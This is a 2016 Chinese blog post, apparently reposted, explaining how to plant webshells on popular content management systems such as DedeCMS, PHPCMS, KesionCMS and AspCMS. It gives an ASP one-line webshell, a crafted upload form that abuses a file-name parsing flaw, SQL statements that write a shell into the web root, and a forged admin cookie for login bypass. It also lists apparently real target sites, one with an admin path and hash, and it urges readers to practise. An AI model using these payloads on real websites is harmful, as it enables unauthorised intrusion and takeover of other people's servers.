技术笔记

主流CMS拿shell(discuz dedecms wordpress phpcms,jeecms,jooml

字号+ 作者:雪花 来源:转载 2016-11-27 15:09 我要评论( )

主流的cms拿shell discuz dedecms wordpress phpcms,jeecms,joomla 每一种cms的robots.txt都是不一样的,根据robots.txt可以大致判断是什么程序 根据网页的图标判......

主流的cms拿shell discuz dedecms  wordpress phpcms,jeecms,joomla
每一种cms的robots.txt都是不一样的,根据robots.txt可以大致判断是什么程序
 
根据网页的图标判断响应的cms
Powered by DedeCMS_V57_GBK_SP1 ? 2004-2011 DesDev Inc. http://hdxlight.com/robots.txt
Powered by Discuz! X3.2  http://www.anywlan.com/robots.txt
版权所有 ? 2016 dis9team | 站点由 zBench 和 WordPress 驱动 http://dis9.eu5.org/robots.txt
CopyRight 2006-2014 酷溜网(北京)科技有限公司 PHPCMS TEAM http://www.hbxtzx.com/robots.txt
http://94.231.96.186/ joomla
 
可以通过zoomeye.org去查找相关目标
如果你想快速的提高拿shell的能力的话,就要多动手去练习,纸上谈兵是不行的
 
http://hbxgyz.cn/Admin/Admin_login.asp 动易
(找到后台,破解MD5,进入后台   前提条件)
南方良精的
1. 在配置里插一句话 
配置中在插入"%><%Eval(Request(chr(112)))%><%'
2双文件上传 
Upfile_Photo.asp
通过upfile_other.asp漏洞文件直接取SHELL 
3.传.cer  大家可以看到程序只限制了对"asp","asa","aspx"类的文件上传,我们只要在”网站配置”的允许的上传文件类型处增加上传“cer“等被服务器可解析的文件类型就可
4.数据库备份 拿shell 你先传一个图片一句话,后缀为test.jpg,然后你备份那个test.jpg为test.asp.asa
 
 
phpweb
 
1利用解析漏洞 1.php;1.jpg   传一个图片一句话
2.存在kedit/upload_cgi/upload.php 本地构造上传
 
<form name=”uploadForm” method=”post” enctype=”multipart/form-data” action=”http://www.xxx.com/kedit/upload_cgi/upload.php”>
<input type=”text” name=”fileName” value=”qxz.php;1.jpg” />
<input type=”hidden” name=”attachPath” value=”news/pics/” />
<input type=”file” name=”fileData” size=”14″ /></td>
<input type=”submit” name=”button” value=”确定” />
</form>
 
3,kesioncms
(1) create table cmd (a varchar(50))
(2) insert into cmd (a) values ('一句话马') 
(3) select * into [a] in '网站根目录1.asa;x.xls' 'excel 4.0;' from cmd 
(4) drop table cmd
我来解释下,四句sql语句大概的意思就是
(1)创建cmd表
(2)cmd表写入一句话
(3)把cmd表中的内容导出
(4)删除cmd表
至于科讯的网站根目录绝对路径可以在数据库备份中找到
好像数据库备份可以burp抓包修改备份名神马的大家都懂的我没试过的说
 
http://www.tzlatin.com/|kesioncms|admin|eb4eec1c5a433882 200122ab
GHDB google hacking 数据库
 
4.dedecms
演示了4种拿shell
http://gstarwd.iteye.com/blog/542376
http://www.t00ts.net/post-121.html
 
5.尘缘雅境
在网站配置里插入一句话
 
6.
aspcms
这个aspcms拿shell也挺简单的,这里我就简单介绍下
在后台登录处可以cookie欺骗
cookies:username=admin; ASPSESSIONIDAABTAACS=IHDJOJACOPKFEEENHHMJHKLG; LanguageAlias=cn; LanguagePath=%2F; languageID=1; adminId=1; adminName=admin; groupMenu=1%2C+70%2C+10%2C+11%2C+12%2C+13%2C+14%2C+20%2C+68%2C+15%2C+
16%2C+17%2C+18%2C+3%2C+25%2C+57%2C+58%2C+59%2C+2%2C+21%2C+22%2C+23%2C+
24%2C+4%2C+27%2C+28%2C+29%2C+5%2C+49%2C+52%2C+56%2C+30%2C+51%2C+53%2C+
54%2C+55%2C+188%2C+67%2C+63%2C+190%2C+184%2C+86%2C+6%2C+32%2C+33%2C+
34%2C+8%2C+37%2C+183%2C+38%2C+60%2C+9; GroupName=%B3%AC%BC%B6%B9%DC%C0%ED%D4%B1%D7%E9
把后台登陆中的login.asp改成index.asp直接进入后台
拿shell直接在模板哪里上传个马儿可自己命名解析漏洞神马的你懂的
如果是非iis6.0环境也可以插入一句话
7.74cms
改模板在模板尾部在一句话
 
8.phpcms
这个好像也有sql执行功能,太久没撸这种站了,忘记了有木有的说
直接编辑模板然后修改首页模板插一句话进去
生成html选择否然后下面有个框选择生成文件扩展名点php保存后直接连接首页文件
没有登录管理员后台,通过解析漏洞拿shell

本文来自: 蜗蜗侠's Blog-关注网络安全 http://blog.icxun.cn/Note/324.html

1.本站遵循行业规范,任何转载的稿件都会明确标注作者和来源;2.本站的原创文章,请转载时务必注明文章作者和来源,不尊重原创的行为我们将追究责任;3.作者投稿可能会经我们编辑修改或补充。

相关文章
网友点评
暂时未开启评论功能~